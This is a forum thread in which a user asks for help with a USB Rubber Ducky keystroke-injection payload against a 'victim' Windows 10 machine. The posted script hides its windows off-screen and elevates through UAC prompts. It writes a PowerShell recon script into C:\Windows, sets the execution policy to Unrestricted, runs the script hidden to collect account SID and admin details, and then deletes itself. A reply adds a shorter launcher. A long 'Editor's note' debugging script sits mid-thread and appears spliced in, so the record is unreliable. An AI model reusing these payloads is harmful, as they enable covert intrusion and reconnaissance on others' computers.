Saylor, posted January 4, 2017

Hey you. I've just received my Rubber Ducky and I thought I'd give one of the generated payloads a go. My victim computer is a 64-bit Win10 machine and I selected "User information" and "save to this computer" as the components of my script. After it's finished executing, the destination folder does have the Report.zip file in it, but the file is empty. I don't even know where to start debugging this, so I'd really appreciate a nudge in the right direction. My keyboard layout is German, so I've selected Germany in the script generator as well, and it seems to be using the German keys correctly (since the ALT+Y presses do work out fine).
xcoder, posted January 5, 2017

Recheck your script. You can post it here and I will check it for you.
Saylor (author), posted January 5, 2017

Quoting xcoder: "Recheck your script. You can post it here and I will check it for you."

Thank you! Here it is:

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired
ENTER
STRING $UserType = $UserInfo.AccountType
ENTER
STRING $UserSid = $UserInfo.SID
ENTER
STRING $UserPass = $UserInfo.PasswordRequired
ENTER
STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
ENTER
STRING $Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>"
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'E:\\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 750
STRING C:\Windows\config-21642.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 750
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-21642.ps1
ENTER

In the payload gen, I entered E:\ as the destination folder.
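Editor's note, added example (this is not Saylor's script or the Duck Toolkit generator's output): the zip step in the posted script is the hardest part to debug, because copy-ToZip polls `$zipPackage.Items().Item($file.name)` in a while loop with no upper bound, and the script is launched with `-windowstyle hidden`, so if Shell.Application never adds the entry the script simply hangs out of sight and Report.zip stays the 22-byte stub. The standalone script below reproduces the same Shell.Application CopyHere mechanism on a known input, but with a deadline, error reporting and a transcript, and then lists what the zip actually contains. The paths, the 30-second timeout and the log file name are assumptions; the "PK" end-of-central-directory stub is the same one the generated script writes.

```powershell
# Test-ReportZip.ps1 (added example, not from the original post)
# Exercises the Shell.Application zip copy on a known input so the
# "Report.zip is empty" symptom can be observed instead of hidden.
param(
    [string]$SrcDir     = (Join-Path $env:USERPROFILE 'Ducky Report test'),  # assumed test folder
    [string]$ZipFile    = 'E:\Report.zip',                                    # destination from the post
    [int]   $TimeoutSec = 30                                                  # assumed bound per file
)

function Test-ReportZip {
    param([string]$SrcDir, [string]$ZipFile, [int]$TimeoutSec)

    # Everything the script prints also goes to a log, so it can be read even when
    # the console window is hidden or closes immediately.
    Start-Transcript -Path (Join-Path $env:TEMP 'ducky-zip-debug.log') -Append | Out-Null
    try {
        # Known input: one small HTML file, like the report the generated script produces.
        New-Item -ItemType Directory -Path $SrcDir -Force | Out-Null
        Set-Content -Path (Join-Path $SrcDir 'ComputerInfo.html') -Value '<html><body>test</body></html>'

        # Same empty-archive stub the generated script writes: "PK" 05 06 followed by
        # 18 zero bytes (an end-of-central-directory record with no entries), written
        # as raw bytes so no trailing newline or encoding BOM is added.
        if (-not (Test-Path $ZipFile)) {
            $stub = New-Object byte[] 22
            $stub[0] = 0x50; $stub[1] = 0x4B; $stub[2] = 0x05; $stub[3] = 0x06
            [IO.File]::WriteAllBytes($ZipFile, $stub)
            (Get-Item $ZipFile).IsReadOnly = $false
        }

        # Shell.Application needs a full path and returns $null if it cannot treat the
        # file as a folder; the posted script never checks this.
        $zipFull = (Get-Item $ZipFile).FullName
        $shell   = New-Object -ComObject Shell.Application
        $zip     = $shell.NameSpace($zipFull)
        if ($null -eq $zip) { throw "Shell.Application could not open '$zipFull' as a zip folder" }

        foreach ($file in Get-ChildItem -Path $SrcDir -File) {
            # CopyHere is asynchronous. 0x14 = 0x4 (no progress dialog) + 0x10 (yes to all).
            $zip.CopyHere($file.FullName, 0x14)
            $deadline = (Get-Date).AddSeconds($TimeoutSec)
            while ($null -eq $zip.ParseName($file.Name)) {
                if ((Get-Date) -gt $deadline) {
                    throw "Timed out after ${TimeoutSec}s waiting for '$($file.Name)' to appear in '$zipFull'"
                }
                Start-Sleep -Milliseconds 500
            }
            Write-Host "Added $($file.Name)"
        }

        # Verify from two angles: the entries Explorer sees, and the size on disk.
        # 22 bytes means the archive is still the empty stub.
        $entries = @($zip.Items() | ForEach-Object { $_.Name })
        $size    = (Get-Item $ZipFile).Length
        Write-Host ("Zip entries : {0}" -f ($entries -join ', '))
        Write-Host ("Zip size    : {0} bytes" -f $size)
        if ($entries.Count -eq 0 -or $size -le 22) { throw "'$ZipFile' is still empty" }
        return $true
    }
    catch {
        Write-Host "FAILED: $($_.Exception.Message)"
        return $false
    }
    finally {
        Stop-Transcript | Out-Null
    }
}

Test-ReportZip -SrcDir $SrcDir -ZipFile $ZipFile -TimeoutSec $TimeoutSec
```

Run it the way the payload will eventually run it, but with the window kept open, for example `powershell.exe -ExecutionPolicy Bypass -NoExit -File .\Test-ReportZip.ps1` from an elevated prompt, and compare with a run from a non-elevated one. Whichever line prints FAILED, or whichever file is last reported as added before the timeout, is the step to look at; the transcript in %TEMP%\ducky-zip-debug.log keeps that output even when the payload later switches back to `-windowstyle hidden`.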
0phoi5, posted January 5, 2017

First thing I would do is set all of the delays to DELAY 5000 and let it run through. Then you can be sure it's not a delay being too short (the PC can't keep up).
xcoder, posted January 5, 2017

Your code is not correct! Copy the script and paste it in Notepad, remove DELAY, STRING, ENTER etc., select all and paste it in PowerShell. Fix it as you like. I'll give a new, short way to run your script.
xcoder Posted January 5, 2017 Share Posted January 5, 2017 (edited) DEFAULT_DELAY 100 DELAY 5000 GUI r DELAY 100 STRING cmd /Q /D /T:FE /F:OFF /V:ON /K mode con lines=1 cols=10 ENTER DELAY 200 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set usb=%d ENTER DELAY 300 STRING %usb% ENTER DELAY 200 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 200 STRING powershell.exe -File %usb%\config-21642.ps1 ENTER DELAY 200 STRING Exit ENTER Rubber Ducky Twin Duck Firmware Your PowerShell inside [USB FLASH DISK] config-21642.ps1 Edited January 5, 2017 by xcoder Quote Link to comment Share on other sites More sharing options...